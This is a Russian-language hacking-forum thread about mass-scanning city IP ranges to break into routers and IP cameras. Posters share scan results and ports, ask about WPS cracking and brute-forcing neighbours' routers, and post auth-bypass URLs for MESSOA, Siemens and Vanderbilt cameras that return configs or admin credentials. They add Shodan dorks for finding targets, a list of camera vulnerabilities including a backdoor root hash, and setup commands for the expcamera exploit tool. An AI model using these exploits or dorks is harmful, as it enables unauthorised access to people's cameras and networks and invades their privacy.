залейте как сайт встанет это всё из минска через ip можете место положение не пробивать это они все за nat завтра надеюсь ещё насканю (это только из двух диапозонов да ито интернет орубился на середине) p.s. предполедния строчка это камера случайно залил
если ты про то что пропал интернет там другая при чина, хотя пока даже был интернет были time aut, ели это то как снизить количество потоков
для любителей эксплойт на камеру MESSOA NIC990. он-же подходит и на некоторые SIEMENS и тошиба Spoiler: description MESSOA NIC990 IP-Camera auth bypass configuration download http://TARGET/cgi-bin/chklogin.cgi?file=config.ini shodan dork : /cgi-bin/chklogin.cgi на шодане правда нашел на скорую руку только сименсы. месоа не попались искомые параметры в строке USERID он правда старенький,но еще актуальный эксплойт на камеры Vanderbilt http://host:port/cgi-bin/readfile.cgi?query=ADMINID возвращает пас и логин админа шодан дорк: title:"Vanderbilt IP-Camera"
Соседские роутеры перекрывают собственный сигнал на 2.4 Ходил просил поменять каналы/снизить мощность сигнала- безуспешно. Приходится самому.... Подскажите, что можно сделать? может посмотреть где-то словари для брута данных моделей? Spoiler
Благодарю. WPS от модели не зависит, получается? И именно брутить или же использовать "Obtain key with WPS"?
какие ещё порты могут использовать роутеры ? в нашем городе просканил весь город и что то мало результатов( Тюмень 80 8080 1080 443 445 554 8000 23 53
На сайте http://3wifi.stascorp.com/stat есть статистика топ30 портов, на которых исследованы роутеры. А теперь внимание, вопрос: Какие еще порты можно использовать? Кроме пяти используемых вами.
Если есть возможность, прошу сделать альтернативу для скачивания Router Scan-а. Уже который день не могу скачать ни с офф.сайта, ни с Яндекс-диска. Буду очень признателен.
сорри за маленький офтоп... хорошее дополнение к роутерскану. для тех кто дружит с линуксом и не тыкает тупо на кнопки позволяет тестировать видеокамеры - expcamera. https://github.com/vanpersiexp/expcamera Spoiler: копипаст копипаста вторичный источник https://darkwebs.ws/threads/63210/ Известны многие уязвимости видеокамер , которые делают последние доступными. При благополучном исходе , их закрывают и разрабатывают патчи. Но не в этом случае. Вы не ослышались , некоторые уязвимости до сих пор носят гордое звание 0 day. Почему так получилось? Ставили конечно в известность производителей.Ответа не получили. Да , многие модели вебок сюда тоже попадают. "После меня - хоть потоп"-Людовик 15 (Главное продажи,пока показатели неплохи,продаём , пока есть спрос) " Я бы продал даже Лондон,если бы нашёлся покупатель"- Ричард Львиное Сердце И покупатели действительно находятся , только китайская школа пошла дальше. И заложила в инструмент эксплуатацию множества уязвимостей: 1) Уязвимость Backdoor Account (CNVD-2017-02751) По умолчанию используется Telnet. Любой пользователь может получить доступ к логину с помощью следующих паролей учетной записи: Код: root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh 2) Уязвимости RSA и раскрытия сертификата (CNVD-2017-02773) Код: /system/www/pem/ck.pem _здесь_содержимое_частных_ключей RSA Apple certificate 3) Информация о предварительной авторизации и уязвимость утечки учётных данных(CNVD-2017-02774) При доступе к файлу конфигурации сервера путем предоставления пустых параметров ?loginuse? и ?loginpas?, злоумышленник может обойти программу аутентификации устройства. Таким образом , возможно загрузить файл конфигурации устройства без входа в систему. Эти файлы конфигурации содержат учетную информацию устройства , а также содержимое учетной записи FTP и SMTP. 4) Уязвимость удаленного выполнения команды (CNVD-2017-02775) Она существует в inset_ftp.cgi в интерфейсе общего интерфейса FTP (CGI). Злоумышленник использует идентификатор администратора ftp для выполнения удаленной команды и дальнейшего получения прав root на сетевом устройстве. 5) Удалённый доступ (CNVD-2017-02776) Получая доступ к URL-ссылке со специальными параметрами, злоумышленник может обойти программу проверки подлинности с полномочиями пользователя root и выполнить различный код в управлении видеокамеры. 6) Уязвимость несанкционированного доступа CNVD-2017-02777) - содержательно звучит конечно,но ,тем ,не менее- Злоумышленник может получить доступ к встроенному серверу RTSP камеры через порт 10554 и смотреть видео в реальном времени без проверки подлинности. 7) Уязвимости функционального дизайна ‘Cloud’(CNVD-2017-02778) Функция, которая включена по умолчанию , позволяет потребителям использовать устройство в управлении сетью. Эта функция использует текстовые туннели UDP для обхода NAT и брандмауэров. Злоумышленник может злоупотреблять этой функцией, чтобы начать атаку грубой силы (brute-force attacks) В общем , более 1200 моделей различных видов продукции на рынке страдают от лазеек. Единственный совет на текущее время-отключить устройство от интернета. Здорово , Господа , не так ли ? Мне тоже нравится. Отступаем от лирики и переходим к сути. Автор замечательного инструмента,который позволяет тестировать видеокамеры-vanpersiexp Называется он expcamera. Как установить: Код: git clone https://github.com/vanpersiexp/expcamera.git cd Expcamera/ chmod exploit_camera.py python exploit_camera.py -h -запуск с выводом опций ./exploit_camera.py -h -можно и так запустить. Я работал на Arch Linux , для остальных дистрибутивов возможно потребуется пакет python3 И с ним же производим запуск в таком случае. Опции можно видеть на скрине. Предлагаю ознакомиться с ними самостоятельно.